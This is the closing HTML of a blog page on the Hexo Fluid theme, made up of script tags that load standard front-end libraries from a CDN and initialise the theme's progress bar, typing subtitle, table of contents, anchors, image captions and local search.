  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
